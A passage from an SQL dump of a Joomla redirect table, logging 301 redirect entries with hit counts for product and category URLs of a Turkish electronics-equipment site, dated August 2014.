00:00:00',301),(3706,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',2,0,'2014-08-18 12:00:49','0000-00-00 00:00:00',301),(3707,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',1,0,'2014-08-18 12:01:11','0000-00-00 00:00:00',301),(3708,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',4,0,'2014-08-18 12:01:18','0000-00-00 00:00:00',301),(3709,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',2,0,'2014-08-18 12:02:55','0000-00-00 00:00:00',301),(3710,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',7,0,'2014-08-18 12:04:12','0000-00-00 00:00:00',301),(3711,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',3,0,'2014-08-18 12:08:28','0000-00-00 00:00:00',301),(3712,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-08-18 12:08:52','0000-00-00 00:00:00',301),(3713,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',10,0,'2014-08-18 12:09:18','0000-00-00 00:00:00',301),(3714,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148','','','',2,0,'2014-08-18 12:13:03','0000-00-00 00:00:00',301),(3715,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',1,0,'2014-08-18 12:14:25','0000-00-00 00:00:00',301),(3716,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79','','','',3,0,'2014-08-18 12:14:44','0000-00-00 00:00:00',301),(3717,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123','','','',2,0,'2014-08-18 12:15:01','0000-00-00 00:00:00',301),(3718,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',1,0,'2014-08-18 12:15:08','0000-00-00 00:00:00',301),(3719,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',6,0,'2014-08-18 12:16:48','0000-00-00 00:00:00',301),(3720,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',3,0,'2014-08-18 12:17:16','0000-00-00 00:00:00',301),(3721,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',2,0,'2014-08-18 12:17:43','0000-00-00 00:00:00',301),(3722,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',2,0,'2014-08-18 12:18:33','0000-00-00 00:00:00',301),(3723,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',1,0,'2014-08-18 12:19:20','0000-00-00 00:00:00',301),(3724,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',5,0,'2014-08-18 12:20:08','0000-00-00 00:00:00',301),(3725,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',2,0,'2014-08-18 12:21:48','0000-00-00 00:00:00',301),(3726,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153','','','',1,0,'2014-08-18 12:22:39','0000-00-00 00:00:00',301),(3727,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',1,0,'2014-08-18 12:23:35','0000-00-00 00:00:00',301),(3728,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',5,0,'2014-08-18 12:24:43','0000-00-00 00:00:00',301),(3729,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',8,0,'2014-08-18 12:25:08','0000-00-00 00:00:00',301),(3730,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',9,0,'2014-08-18 12:26:48','0000-00-00 00:00:00',301),(3731,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',1,0,'2014-08-18 12:28:33','0000-00-00 00:00:00',301),(3732,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',3,0,'2014-08-18 12:29:44','0000-00-00 00:00:00',301),(3733,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',2,0,'2014-08-18 12:30:08','0000-00-00 00:00:00',301),(3734,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',3,0,'2014-08-18 12:30:33','0000-00-00 00:00:00',301),(3735,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60','','','',4,0,'2014-08-18 12:32:38','0000-00-00 00:00:00',301),(3736,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',2,0,'2014-08-18 12:33:28','0000-00-00 00:00:00',301),(3737,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',5,0,'2014-08-18 12:34:18','0000-00-00 00:00:00',301),(3738,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',2,0,'2014-08-18 12:37:38','0000-00-00 00:00:00',301),(3739,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',2,0,'2014-08-18 12:38:57','0000-00-00 00:00:00',301),(3740,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',3,0,'2014-08-18 12:39:06','0000-00-00 00:00:00',301),(3741,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',4,0,'2014-08-18 12:40:58','0000-00-00 00:00:00',301),(3742,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',1,0,'2014-08-18 12:41:58','0000-00-00 00:00:00',301),(3743,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140','','','',3,0,'2014-08-18 12:42:14','0000-00-00 00:00:00',301),(3744,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',6,0,'2014-08-18 12:44:18','0000-00-00 00:00:00',301),(3745,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',2,0,'2014-08-18 12:45:08','0000-00-00 00:00:00',301),(3746,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112','','','',3,0,'2014-08-18 12:45:58','0000-00-00 00:00:00',301),(3747,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',10,0,'2014-08-18 12:48:28','0000-00-00 00:00:00',301),(3748,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',2,0,'2014-08-18 12:51:48','0000-00-00 00:00:00',301),(3749,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',5,0,'2014-08-18 12:52:38','0000-00-00 00:00:00',301),(3750,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',1,0,'2014-08-18 12:54:18','0000-00-00 00:00:00',301),(3751,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',3,0,'2014-08-18 12:55:58','0000-00-00 00:00:00',301),(3752,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',4,0,'2014-08-18 12:56:48','0000-00-00 00:00:00',301),(3753,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',7,0,'2014-08-18 12:58:29','0000-00-00 00:00:00',301),(3754,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-08-18 12:59:33','0000-00-00 00:00:00',301),(3755,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',4,0,'2014-08-18 13:01:25','0000-00-00 00:00:00',301),(3756,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',6,0,'2014-08-18 13:02:13','0000-00-00 00:00:00',301),(3757,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144','','','',1,0,'2014-08-18 13:02:34','0000-00-00 00:00:00',301),(3758,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',5,0,'2014-08-18 13:02:37','0000-00-00 00:00:00',301),(3759,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',4,0,'2014-08-18 13:03:03','0000-00-00 00:00:00',301),(3760,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',2,0,'2014-08-18 13:03:25','0000-00-00 00:00:00',301),(3761,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',6,0,'2014-08-18 13:05:13','0000-00-00 00:00:00',301),(3762,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',3,0,'2014-08-18 13:05:59','0000-00-00 00:00:00',301),(3763,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',3,0,'2014-08-18 13:08:34','0000-00-00 00:00:00',301),(3764,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',3,0,'2014-08-18 13:10:08','0000-00-00 00:00:00',301),(3765,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',6,0,'2014-08-18 13:10:21','0000-00-00 00:00:00',301),(3766,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',2,0,'2014-08-18 13:10:58','0000-00-00 00:00:00',301),(3767,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',2,0,'2014-08-18 13:11:48','0000-00-00 00:00:00',301),(3768,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',7,0,'2014-08-18 13:13:04','0000-00-00 00:00:00',301),(3769,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',7,0,'2014-08-18 13:14:13','0000-00-00 00:00:00',301),(3770,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default','','','',3,0,'2014-08-18 13:14:18','0000-00-00 00:00:00',301),(3771,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',4,0,'2014-08-18 13:15:32','0000-00-00 00:00:00',301),(3772,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',4,0,'2014-08-18 13:15:57','0000-00-00 00:00:00',301),(3773,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',2,0,'2014-08-18 13:16:47','0000-00-00 00:00:00',301),(3774,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95','','','',3,0,'2014-08-18 13:18:02','0000-00-00 00:00:00',301),(3775,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146','','','',5,0,'2014-08-18 13:18:30','0000-00-00 00:00:00',301),(3776,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',7,0,'2014-08-18 13:18:53','0000-00-00 00:00:00',301),(3777,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',8,0,'2014-08-18 13:20:33','0000-00-00 00:00:00',301),(3778,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',2,0,'2014-08-18 13:21:48','0000-00-00 00:00:00',301),(3779,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',9,0,'2014-08-18 13:22:37','0000-00-00 00:00:00',301),(3780,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-18 13:23:37','0000-00-00 00:00:00',301),(3781,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153','','','',2,0,'2014-08-18 13:24:42','0000-00-00 00:00:00',301),(3782,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',1,0,'2014-08-18 13:25:32','0000-00-00 00:00:00',301),(3783,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',1,0,'2014-08-18 13:26:23','0000-00-00 00:00:00',301),(3784,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',4,0,'2014-08-18 13:28:02','0000-00-00 00:00:00',301),(3785,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',9,0,'2014-08-18 13:28:52','0000-00-00 00:00:00',301),(3786,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',5,0,'2014-08-18 13:29:43','0000-00-00 00:00:00',301),(3787,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',3,0,'2014-08-18 13:32:51','0000-00-00 00:00:00',301),(3788,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61','','','',1,0,'2014-08-18 13:33:39','0000-00-00 00:00:00',301),(3789,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',1,0,'2014-08-18 13:35:07','0000-00-00 00:00:00',301),(3790,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152','','','',4,0,'2014-08-18 13:36:11','0000-00-00 00:00:00',301),(3791,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-18 13:36:22','0000-00-00 00:00:00',301),(3792,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159&Itemid=162&lang=tr','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=420.HrDtGL1EsPflURlRrLkZa5TwtcZOM8qcgXzgIFsev_I.05d267d21bdd11ed8bb1','',10,0,'2014-08-18 13:36:25','0000-00-00 00:00:00',301),(3793,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28','','','',2,0,'2014-08-18 13:37:12','0000-00-00 00:00:00',301),(3794,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',14,0,'2014-08-18 13:38:02','0000-00-00 00:00:00',301),(3795,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',2,0,'2014-08-18 13:38:53','0000-00-00 00:00:00',301),(3796,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-18 13:39:17','0000-00-00 00:00:00',301),(3797,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',1,0,'2014-08-18 13:43:52','0000-00-00 00:00:00',301),(3798,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',1,0,'2014-08-18 13:44:00','0000-00-00 00:00:00',301),(3799,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',4,0,'2014-08-18 13:49:43','0000-00-00 00:00:00',301),(3800,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',3,0,'2014-08-18 13:50:09','0000-00-00 00:00:00',301),(3801,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',2,0,'2014-08-18 13:51:47','0000-00-00 00:00:00',301),(3802,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',4,0,'2014-08-18 13:54:17','0000-00-00 00:00:00',301),(3803,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',2,0,'2014-08-18 13:55:32','0000-00-00 00:00:00',301),(3804,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',7,0,'2014-08-18 13:55:57','0000-00-00 00:00:00',301),(3805,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',3,0,'2014-08-18 13:56:05','0000-00-00 00:00:00',301),(3806,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',3,0,'2014-08-18 13:56:22','0000-00-00 00:00:00',301),(3807,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',2,0,'2014-08-18 13:56:48','0000-00-00 00:00:00',301),(3808,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',1,0,'2014-08-18 13:57:12','0000-00-00 00:00:00',301),(3809,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',11,0,'2014-08-18 14:02:49','0000-00-00 00:00:00',301),(3810,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',1,0,'2014-08-18 14:04:02','0000-00-00 00:00:00',301),(3811,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',2,0,'2014-08-18 14:24:44','0000-00-00 00:00:00',301),(3812,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',2,0,'2014-08-18 14:25:07','0000-00-00 00:00:00',301),(3813,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',1,0,'2014-08-18 14:29:42','0000-00-00 00:00:00',301),(3814,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',2,0,'2014-08-18 14:30:59','0000-00-00 00:00:00',301),(3815,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',2,0,'2014-08-18 14:33:02','0000-00-00 00:00:00',301),(3816,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',1,0,'2014-08-18 14:33:27','0000-00-00 00:00:00',301),(3817,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',2,0,'2014-08-18 14:36:23','0000-00-00 00:00:00',301),(3818,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',1,0,'2014-08-18 14:38:14','0000-00-00 00:00:00',301),(3819,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',8,0,'2014-08-18 14:40:07','0000-00-00 00:00:00',301),(3820,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',2,0,'2014-08-18 14:40:32','0000-00-00 00:00:00',301),(3821,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-08-18 14:43:53','0000-00-00 00:00:00',301),(3822,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154','','','',3,0,'2014-08-18 14:43:54','0000-00-00 00:00:00',301),(3823,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',1,0,'2014-08-18 14:45:23','0000-00-00 00:00:00',301),(3824,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',1,0,'2014-08-18 14:56:21','0000-00-00 00:00:00',301),(3825,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',2,0,'2014-08-18 15:01:33','0000-00-00 00:00:00',301),(3826,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',1,0,'2014-08-18 15:08:55','0000-00-00 00:00:00',301),(3827,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',2,0,'2014-08-18 15:09:21','0000-00-00 00:00:00',301),(3828,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',2,0,'2014-08-18 15:10:40','0000-00-00 00:00:00',301),(3829,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',1,0,'2014-08-18 15:12:58','0000-00-00 00:00:00',301),(3830,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',5,0,'2014-08-18 15:15:26','0000-00-00 00:00:00',301),(3831,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',8,0,'2014-08-18 15:17:09','0000-00-00 00:00:00',301),(3832,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',1,0,'2014-08-18 15:23:08','0000-00-00 00:00:00',301),(3833,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',1,0,'2014-08-18 15:24:30','0000-00-00 00:00:00',301),(3834,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',2,0,'2014-08-18 15:26:00','0000-00-00 00:00:00',301),(3835,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',2,0,'2014-08-18 15:26:16','0000-00-00 00:00:00',301),(3836,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',1,0,'2014-08-18 15:27:13','0000-00-00 00:00:00',301),(3837,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',2,0,'2014-08-18 15:27:44','0000-00-00 00:00:00',301),(3838,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',1,0,'2014-08-18 15:28:16','0000-00-00 00:00:00',301),(3839,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',7,0,'2014-08-18 15:44:07','0000-00-00 00:00:00',301),(3840,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',2,0,'2014-08-18 15:48:26','0000-00-00 00:00:00',301),(3841,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',1,0,'2014-08-18 16:22:49','0000-00-00 00:00:00',301),(3842,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',5,0,'2014-08-18 16:23:17','0000-00-00 00:00:00',301),(3843,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',2,0,'2014-08-18 16:30:27','0000-00-00 00:00:00',301),(3844,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',1,0,'2014-08-18 16:30:34','0000-00-00 